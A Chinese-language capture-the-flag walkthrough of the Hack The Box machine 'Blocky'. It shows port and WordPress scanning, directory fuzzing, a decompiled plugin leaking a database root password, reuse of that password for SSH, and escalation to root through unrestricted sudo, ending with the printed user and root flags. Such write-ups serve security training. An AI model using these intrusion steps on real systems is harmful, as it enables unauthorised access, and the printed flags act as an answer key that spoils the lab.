Hackthebox - Blocky
靶场信息
靶场类型
信息搜集
Nmap
┌──(root💀kali)-[~/Desktop/HTB/Easy/Blocky]
└─# nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.10.37
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-28 23:15 EDT
Nmap scan report for 10.10.10.37
Host is up (0.46s latency).
Not shown: 65530 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5a
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
| 256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_ 256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.8
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: BlockyCraft – Under Construction!
8192/tcp closed sophos
25565/tcp open minecraft Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)
Device type: general purpose|WAP|specialized|storage-misc|printer
Running (JUST GUESSING): Linux 3.X|4.X|2.6.X (94%), Asus embedded (90%), Crestron 2-Series (88%), HP embedded (88%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel cpe:/h:asus:rt-ac66u cpe:/o:crestron:2_series cpe:/h:hp:p2000_g3 cpe:/o:linux:linux_kernel:2.6.22 cpe:/o:linux:linux_kernel:3.4
Aggressive OS guesses: Linux 3.10 - 4.11 (94%), Linux 3.13 or 4.2 (94%), Linux 4.2 (94%), Linux 4.4 (94%), Linux 3.13 (93%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.12 (90%), Linux 3.18 (90%), Linux 3.2 - 4.9 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 8192/tcp)
HOP RTT ADDRESS
1 535.09 ms 10.10.16.1
2 535.21 ms 10.10.10.37
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 163.96 seconds
这台有点意思,看起来像是 Minectfat(我的世界)这款游戏的一台服务器
Http
这台有点意思的,往下翻可以看到是 wordpress 搭建的,去做个 wpscan
WPScan
┌──(root💀kali)-[~/Desktop]
└─# wpscan --url http://10.10.10.37/
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.17
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://10.10.10.37/ [10.10.10.37]
[+] Started: Mon Mar 28 23:21:07 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://10.10.10.37/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://10.10.10.37/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://10.10.10.37/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://10.10.10.37/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.8 identified (Insecure, released on 2017-06-08).
| Found By: Rss Generator (Passive Detection)
| - http://10.10.10.37/index.php/feed/, <generator>https://wordpress.org/?v=4.8</generator>
| - http://10.10.10.37/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.8</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://10.10.10.37/wp-content/themes/twentyseventeen/
| Last Updated: 2022-01-25T00:00:00.000Z
| Readme: http://10.10.10.37/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 2.9
| Style URL: http://10.10.10.37/wp-content/themes/twentyseventeen/style.css?ver=4.8
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.10.37/wp-content/themes/twentyseventeen/style.css?ver=4.8, Match: 'Version: 1.3'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:20 <=====================================================================================================================================> (137 / 137) 100.00% Time: 00:00:20
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Mon Mar 28 23:21:31 2022
[+] Requests Done: 139
[+] Cached Requests: 37
[+] Data Sent: 34.403 KB
[+] Data Received: 19.875 KB
[+] Memory used: 224.391 MB
[+] Elapsed time: 00:00:23
没看到什么特别明显的可用的漏洞,去 fuzz 一下目录看看
Fuzz
┌──(root💀kali)-[~/Desktop]
└─# ffuf -u "http://10.10.10.37/FUZZ" -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://10.10.10.37/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
wp-includes [Status: 301, Size: 316, Words: 20, Lines: 10]
wp-content [Status: 301, Size: 315, Words: 20, Lines: 10]
plugins [Status: 301, Size: 312, Words: 20, Lines: 10]
wp-admin [Status: 301, Size: 313, Words: 20, Lines: 10]
javascript [Status: 301, Size: 315, Words: 20, Lines: 10]
wiki [Status: 301, Size: 309, Words: 20, Lines: 10]
phpmyadmin [Status: 301, Size: 315, Words: 20, Lines: 10]
server-status [Status: 403, Size: 299, Words: 22, Lines: 12]
[Status: 200, Size: 52256, Words: 3306, Lines: 314]
:: Progress: [20116/20116] :: Job [1/1] :: 70 req/sec :: Duration: [0:12:10] :: Errors: 6 ::
有一个 phpmyadmin 目录,去尝试一下
使用默认口令登录失败
漏洞利用
漏洞发现
然后看到有一个 plugins 目录,去看看插件
这里有一个 BlockyCore.jar 下载下来看看
┌──(root💀kali)-[~/…/HTB/Easy/Blocky/BlockyCore]
└─# ls
BlockyCore.jar
┌──(root💀kali)-[~/…/HTB/Easy/Blocky/BlockyCore]
└─# unzip BlockyCore.jar
Archive: BlockyCore.jar
inflating: META-INF/MANIFEST.MF
inflating: com/myfirstplugin/BlockyCore.class
┌──(root💀kali)-[~/…/HTB/Easy/Blocky/BlockyCore]
└─# ls
BlockyCore.jar com META-INF
┌──(root💀kali)-[~/…/HTB/Easy/Blocky/BlockyCore]
└─# cd com
┌──(root💀kali)-[~/…/Easy/Blocky/BlockyCore/com]
└─# ls -la
总用量 12
drwxr-xr-x 3 root root 4096 3月 29 00:25 .
drwxr-xr-x 4 root root 4096 3月 29 00:25 ..
drwxr-xr-x 2 root root 4096 3月 29 00:25 myfirstplugin
┌──(root💀kali)-[~/…/Easy/Blocky/BlockyCore/com]
└─# cd myfirstplugin
┌──(root💀kali)-[~/…/Blocky/BlockyCore/com/myfirstplugin]
└─# ls -la
总用量 12
drwxr-xr-x 2 root root 4096 3月 29 00:25 .
drwxr-xr-x 3 root root 4096 3月 29 00:25 ..
-rw-r--r-- 1 root root 939 7月 2 2017 BlockyCore.class
解压出来了,去使用 java 的反编译器 jd-gui 查看一下
apt install jd-gui
安装 jd-gui
package com.myfirstplugin;
public class BlockyCore {
public String sqlHost = "localhost";
public String sqlUser = "root";
public String sqlPass = "8YsqfCTnvxAUeduzjNSXe22";
public void onServerStart() {}
public void onServerStop() {}
public void onPlayerJoin() {
sendMessage("TODO get username", "Welcome to the BlockyCraft!!!!!!!");
}
public void sendMessage(String username, String message) {}
}
使用 jd-gui 打开 BlockyCore.class 后,我们可以看到有一个 sql 的账号和密码
正好我们有 phpmyadmin 去登陆一下
登录成功
既然这个账号可以登录 sql 数据库,那证明肯定是一个系统账户,那我们是否可用这个系统账户进行登录 ssh 呢?去尝试一下
┌──(root💀kali)-[~/Desktop]
└─# ssh root@10.10.10.37
The authenticity of host '10.10.10.37 (10.10.10.37)' can't be established.
ECDSA key fingerprint is SHA256:lg0igJ5ScjVO6jNwCH/OmEjdeO2+fx+MQhV/ne2i900.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.37' (ECDSA) to the list of known hosts.
root@10.10.10.37's password:
Permission denied, please try again.
root@10.10.10.37's password:
Permission denied, please try again.
root@10.10.10.37's password:
登录失败了,那是否是其他账号的呢?我们目前也没有其他账号,去获取一下
账号获取
首先可以看到唯一一篇文章的发布人是 NOTCH(Minecraft 这款游戏的创始人)
那他很可能就是一个账号,同时我们去数据库内也看一下
在数据库内也可以看到,只有 NOTCH 这一个账号,我想应该就是了,去尝试一下吧
┌──(root💀kali)-[~/Desktop]
└─# ssh notch@10.10.10.37 130 ⨯
notch@10.10.10.37's password:
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
7 packages can be updated.
7 updates are security updates.
Last login: Sun Dec 24 09:34:35 2017
notch@Blocky:~$ whoami&&id
notch
uid=1000(notch) gid=1000(notch) groups=1000(notch),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
登录成功
notch@Blocky:~$ cat user.txt
59fee0977fb60b8a0bc6e41e751f3cd5
成功获得 user 权限的 flag 文件
权限提升
notch@Blocky:~$ sudo -l
[sudo] password for notch:
Matching Defaults entries for notch on Blocky:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User notch may run the following commands on Blocky:
(ALL : ALL) ALL
查看一下 sudo -l,我们的 NOTCH 账户拥有所有权限,那直接提权吧
notch@Blocky:~$ sudo su
root@Blocky:/home/notch# whoami&&id
root
uid=0(root) gid=0(root) groups=0(root)
成功提权到 root 权限
root@Blocky:/home/notch# cat /root/root.txt
0a9694a5b4d272c694679f7860f1cd5f
成功拿到 root 权限的 flag 文件
